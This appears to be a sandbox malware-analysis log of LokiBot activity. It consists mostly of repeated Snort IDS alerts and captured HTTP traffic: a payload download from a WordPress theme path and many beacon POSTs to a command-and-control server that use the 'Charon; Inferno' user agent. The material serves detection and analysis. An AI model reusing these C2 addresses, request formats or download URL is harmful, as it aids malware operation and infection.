                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49239
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49240
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49241
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49242
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49243
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49244
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49245
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49246
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49247
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49248
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49249
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49250
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49251
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49252
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49253
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49254
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49255
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49256
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49257
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49258
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49259
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49260
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49261
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49262
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49263
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49264
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49265
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49266
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49267
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49268 -> 185.206.215.56:80
                Source: global trafficHTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.22.0.232 104.22.0.232
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
